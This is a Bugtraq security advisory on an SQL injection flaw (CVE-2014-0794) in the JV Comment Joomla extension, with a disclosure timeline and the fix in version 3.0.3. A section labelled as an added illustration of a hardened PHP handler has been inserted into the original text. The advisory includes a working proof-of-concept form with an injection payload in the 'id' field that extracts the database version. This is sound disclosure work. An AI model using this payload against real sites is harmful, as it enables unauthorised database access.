List: bugtraq
Subject: SQL Injection in JV Comment Joomla Extension
From: High-Tech Bridge Security Research <advisory () htbridge ! com>
Date: 2014-01-23 12:13:29
Message-ID: 20140123121329.4CFD62C5864E () htbridge ! ch
Advisory ID: HTB23195
Product: JV Comment Joomla Extension
Vendor: joomlavi.com
Vulnerable Version(s): 3.0.2 and probably prior
Tested Version: 3.0.2
Advisory Publication: January 2, 2014 [without technical details]
Vendor Notification: January 2, 2014
Vendor Patch: January 14, 2014
Public Disclosure: January 23, 2014
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2014-0794
Risk Level: Medium
CVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered an SQL injection vulnerability in JV Comment Joomla Extension, which can be exploited to perform SQL Injection attacks.
1) SQL Injection in JV Comment Joomla Extension: CVE-2014-0794
The vulnerability exists due to insufficient validation of the "id" HTTP POST parameter passed to the "/index.php" script. A remote authenticated attacker can execute arbitrary SQL commands in the application's database.
The following exploitation example displays the version of the MySQL database:
<form action="http://[host]/index.php" method="post" name="main">
<input type="hidden" name="option" value="com_jvcomment">
<input type="hidden" name="task" value="comment.like">
<input type="hidden" name="id" value="1 AND 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2)))">
<input type="submit" id="btn">
</form>
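The root cause above is that a value meant to be a comment id reaches the query as a string. As an added example (not JV Comment's own code, and not the vendor's patch), the handler below shows the defensive pattern a Joomla extension should apply to such a parameter: strictly validate "id" as a positive integer before it touches SQL, and build the query through Joomla's query builder with the integer re-cast. The function names jvcomment_validate_id and jvcomment_like, the table name #__jvcomment and the column names id and likes are assumptions made for the illustration.

```php
<?php
// Added example, not JV Comment's code: a hardened "comment.like" handler.
// Table "#__jvcomment" and columns "id"/"likes" are assumed names.

defined('_JEXEC') or die;

/**
 * Validate the "id" request parameter as a strictly positive integer.
 * Returns the integer, or null when the value is absent or is not a plain
 * run of digits. A value such as "1 AND 1=(select ...)" is rejected here
 * instead of being spliced into SQL.
 */
function jvcomment_validate_id($raw)
{
    if (!is_string($raw) && !is_int($raw)) {
        return null;
    }
    $s = (string) $raw;
    // ctype_digit accepts ASCII digits only: no spaces, operators, sign or quotes.
    if ($s === '' || !ctype_digit($s) || strlen($s) > 10) {
        return null;
    }
    $id = (int) $s;
    return $id > 0 ? $id : null;
}

/**
 * Increment the like counter for one comment (assumed schema).
 * Throws on a malformed id so the request fails closed with HTTP 400.
 */
function jvcomment_like()
{
    $app   = JFactory::getApplication();
    $input = $app->input;

    // JInput::getInt() would silently reduce "1 AND 1=..." to 1; the strict
    // check on the raw string refuses the request outright instead.
    $id = jvcomment_validate_id($input->getString('id', ''));
    if ($id === null) {
        throw new InvalidArgumentException('Invalid comment id', 400);
    }

    $db    = JFactory::getDbo();
    $query = $db->getQuery(true)
        ->update($db->quoteName('#__jvcomment'))
        ->set($db->quoteName('likes') . ' = ' . $db->quoteName('likes') . ' + 1')
        // The validated integer is re-cast; no request string is ever interpolated.
        ->where($db->quoteName('id') . ' = ' . (int) $id);

    $db->setQuery($query);
    $db->execute();
}
```

The strict digit check is deliberately stricter than the framework's INT filter: rejecting the request makes a tampered parameter visible in the application's error log, whereas silently truncating "1 AND ..." to 1 would hide the probe. Either way the payload never reaches the database as SQL.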
-----------------------------------------------------------------------------------------------
Solution:
Update to JV Comment 3.0.3
More Information:
http://extensions.joomla.org/extensions/contacts-and-feedback/articles-comments/23394
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23195 - https://www.htbridge.com/advisory/HTB23195 - SQL Injection in JV Comment Joomla Extension.
[2] JV Comment Joomla Extension - http://www.joomlavi.com/joomla-extensions/jv-comment.html - With JV Comment, adding a comment system to your articles is now as simple as installing a plug-in and adjusting a few parameters.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.